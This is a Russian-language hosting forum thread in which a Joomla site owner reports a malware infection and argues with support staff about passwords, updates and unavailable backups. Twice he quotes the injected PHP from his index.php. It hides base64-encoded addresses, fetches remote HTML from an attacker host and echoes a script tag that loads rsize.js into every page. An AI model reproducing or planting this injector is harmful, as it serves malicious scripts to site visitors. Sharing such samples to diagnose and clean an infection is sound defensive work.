Страница 1 из 1

Ну здравствуйте rsize.js

Добавлено: 2013-02-10, 12:11:15
Алексей
В помощь тем кто пользует Joomla.
На днях мои саты которые тут хостятся в очередной раз поймали вирус, вторая волна после Новогодних приключений..
И так по порядку, гадость прописалась в index.php и пытается загрузить скрипт отсюда
h**p://feelthesame.changeip.name/rsize.js

вот код того что прописалось

Код: Выделить всё

// Return the response.
echo $app;
function sql2_safe($in) {
        $rtn = base64_decode($in);
        return $rtn;

function collectnewss() {
        $get = sql2_safe("aHR0cDovL2N0cmxzaS5jaGFuZ2VpcC5uYW1lOjg4OC9zY3JpcHQuaHRtbA==");
		$content = @file_get_contents($get);
		if (!$content)
			echo sql2_safe("PHNjcmlwdCBzcmM9Imh0dHA6Ly9mZWVsdGhlc2FtZS5jaGFuZ2VpcC5uYW1lL3JzaXplLmpzIj48L3NjcmlwdD4=");
		else 
			echo $content;
}
collectnewss ();

удалил строки !

Код: Выделить всё

function collectnewss() {
        $get = sql2_safe("aHR0cDovL2N0cmxzaS5jaGFuZ2VpcC5uYW1lOjg4OC9zY3JpcHQuaHRtbA==");
		$content = @file_get_contents($get);
		if (!$content)
			echo sql2_safe("PHNjcmlwdCBzcmM9Imh0dHA6Ly9mZWVsdGhlc2FtZS5jaGFuZ2VpcC5uYW1lL3JzaXplLmpzIj48L3NjcmlwdD4=");
		else 
			echo $content;
}
collectnewss ();
устал уже воевать .. :(

Re: Ну здравствуйте rsize.js

Добавлено: 2013-02-10, 13:23:44
lissyara
как бы стандартный набор рекомендаций:
проверить свой комьютер на вирусы
сменить все пароли, обязательно на на сложные
обновить движок сайта до последней версии

Re: Ну здравствуйте rsize.js

Добавлено: 2013-02-10, 17:10:28
Гость
Ну вы уж извините, но это не стандартный набор рекомендаций, а стандартный набор отмазок....
Вирусов отродясь не было, брэндмауэр и антивирус следят за этим строго.. CMS тоже обновлен до последней версии....
И пароли вы предлагаете менять каждую неделю или каждый месяц ????

Re: Ну здравствуйте rsize.js

Добавлено: 2013-02-10, 18:41:47
lissyara
с учётом что проблемы у вас, и только у вас - других рекомендаций не будет.
проблема не в хостинге, а в движке вашего сайта, плагинах, вирусах, паролях...

Re: Ну здравствуйте rsize.js

Добавлено: 2013-02-10, 20:17:37
Гость
lissyara писал(а):с учётом что проблемы у вас, и только у вас - других рекомендаций не будет.
проблема не в хостинге, а в движке вашего сайта, плагинах, вирусах, паролях...
Да да конечно .. проблемы только у меня .. кто же спорит .. вам то пофиг на все это, серваки стоят и пашут. А то что вечные сбои, что профилактика без предупреждений .. это все проблемы клиена...
с тремя сайтами на хостинге nic.ru за последние 3 года ниразу ничем подобным не страдал, а тут блин посоветовал "товарищ", чтоб его, за год уже натерпелся...
нафиг отдаю пароли клиентам, пусть сами с вами связываются.. нафиг мне такое счастье...

Re: Ну здравствуйте rsize.js

Добавлено: 2013-02-10, 20:28:06
lissyara
а, дак это вы утром с бэкапами были? =)
--
сервер бэкапов к приоритетным не относится.
сайты работают? ну а то что бэкапы недоступны некоторое время - издержки производства =))

Re: Ну здравствуйте rsize.js

Добавлено: 2013-02-11, 8:32:44
Алексей
lissyara писал(а):а, дак это вы утром с бэкапами были? =)
--
сервер бэкапов к приоритетным не относится.
сайты работают? ну а то что бэкапы недоступны некоторое время - издержки производства =))
Я про то и говорю что у вас все ОК.. у вас проблем нет.. проблемы только у нас... Только как же они к приоритетным не относятся если мне необходимо чтоб сайт функционировал а я не могу с вашего сервера ничего достать ? Еслиб я знал что он у вас на профилактике, я бы ничем не занимался и просто дождался когда у вас профилактика пройдет. А тут удалил все, хочу восстановить а мне фигу на весь экран ... и главное нигде и ничего не написано ... да и не важно приоритетный сервак или нет, вы все равно не предупреждаете ни о чем... предупреждение было тольк 1 раз, когда вы меняли местоположение сайтов с одного srv на другой ...

Re: Ну здравствуйте rsize.js

Добавлено: 2013-02-12, 3:09:30
adre
Гость писал(а):Ну вы уж извините, но это не стандартный набор рекомендаций, а стандартный набор отмазок....
Вирусов отродясь не было, брэндмауэр и антивирус следят за этим строго.. CMS тоже обновлен до последней версии....
И пароли вы предлагаете менять каждую неделю или каждый месяц ????
следите за обновлением своих бесплатных cms. кейлогеры не кто не отменял. пароли можете и не менять - это перестраховка.